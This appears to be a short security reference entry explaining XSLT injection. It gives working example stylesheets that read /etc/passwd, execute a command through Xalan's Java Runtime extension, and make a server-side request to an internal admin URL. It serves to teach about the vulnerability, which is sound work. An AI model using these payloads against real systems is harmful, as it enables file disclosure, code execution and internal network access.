XSLT Injection

XSLT Injection is a vulnerability where attackers can inject malicious content into XSLT (Extensible Stylesheet Language Transformations) stylesheets, potentially leading to information disclosure, server-side request forgery, or remote code execution.

How It Works

XSLT transforms XML documents using stylesheet rules. When user input influences XSLT processing or stylesheet content, attackers can inject XSLT elements that access the filesystem, make network requests, or execute code through extension functions.

Information Disclosure

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <!-- Read local file -->
    <xsl:value-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

Code Execution (Java)

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
                version="1.0">
  <xsl:template match="/">
    <xsl:variable name="rtobject" select="rt:getRuntime()"/>
    <xsl:variable name="process" select="rt:exec($rtobject,'whoami')"/>
  </xsl:template>
</xsl:stylesheet>

SSRF via XSLT

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:value-of select="document('http://internal-server/admin')"/>
  </xsl:template>
</xsl:stylesheet>

Vulnerable Contexts

• PDF generators using XML/XSLT
• Document conversion services
• XML-based reporting systems
• Content management systems

See Also

• XML External Entity
• Server-Side Template Injection
• Server-Side Request Forgery